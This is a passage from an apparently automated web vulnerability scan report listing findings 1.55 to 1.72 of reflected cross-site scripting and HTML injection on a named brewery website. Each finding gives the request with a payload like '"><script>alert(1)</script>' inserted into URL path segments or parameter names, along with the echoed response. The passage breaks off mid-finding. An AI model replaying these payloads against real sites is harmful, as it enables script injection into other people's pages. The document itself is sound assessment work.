This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js" method="post">
...[SNIP]...

1.55. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/basic.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9463"><script>alert(1)</script>0cdb8fc9cbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js" method="post">
...[SNIP]...

1.56. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/basic.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b208"><script>alert(1)</script>e00028e101d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d" method="post">
...[SNIP]...

1.57. http://www.ninkasibrewing.com/contact/content/js/basic.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/basic.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407cb"><script>alert(1)</script>31b20d5279f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1" method="post">
...[SNIP]...

1.58. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c1c"><a>a8cde8ac9b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact17c1c"><a>a8cde8ac9b3/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contact17c1c"><a>a8cde8ac9b3_page" class="contact17c1c">
...[SNIP]...

1.59. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb4b5"><script>alert(1)</script>1a875df3c26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css" method="post">
...[SNIP]...

1.60. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3d1"><script>alert(1)</script>ecfeb04c9eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css" method="post">
...[SNIP]...

1.61. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d476b"><script>alert(1)</script>a689b0522a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2" method="post">
...[SNIP]...

1.62. http://www.ninkasibrewing.com/contact/content/js/combined.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71815"><script>alert(1)</script>1eba9a79caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1" method="post">
...[SNIP]...

1.63. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5da"><a>6d080ef4815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactbb5da"><a>6d080ef4815/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contactbb5da"><a>6d080ef4815_page" class="contactbb5da">
...[SNIP]...

1.64. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350e"><script>alert(1)</script>c3cd6c52bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js" method="post">
...[SNIP]...

1.65. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e7c2"><script>alert(1)</script>abe7c99ab4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js" method="post">
...[SNIP]...

1.66. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20af2"><script>alert(1)</script>da4e655317a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a" method="post">
...[SNIP]...

1.67. http://www.ninkasibrewing.com/contact/content/js/combined.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/combined.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfc"><script>alert(1)</script>1139d382123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1" method="post">
...[SNIP]...

1.68. http://www.ninkasibrewing.com/content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b52"><a>dca3b514689 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta4b52"><a>dca3b514689/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contenta4b52"><a>dca3b514689_page" class="contenta4b52">
...[SNIP]...

1.69. http://www.ninkasibrewing.com/content/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5f9"><a>6ec3d9ffd59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbb5f9"><a>6ec3d9ffd59/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentbb5f9"><a>6ec3d9ffd59_page" class="contentbb5f9">
...[SNIP]...

1.70. http://www.ninkasibrewing.com/content/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f696"><a>14eab4f7f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f696"><a>14eab4f7f64/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content6f696"><a>14eab4f7f64_page" class="content6f696">
...[SNIP]...

1.71. http://www.ninkasibrewing.com/content/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a612"><a>155fb3b9f51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content3a612"><a>155fb3b9f51/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content3a612"><a>155fb3b9f51_page" class="content3a612">
...[SNIP]...

1.72. http://www.ninkasibrewing.com/content/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf9b"><a>e851ee84c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentedf9b"><a>e851ee84c8f/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
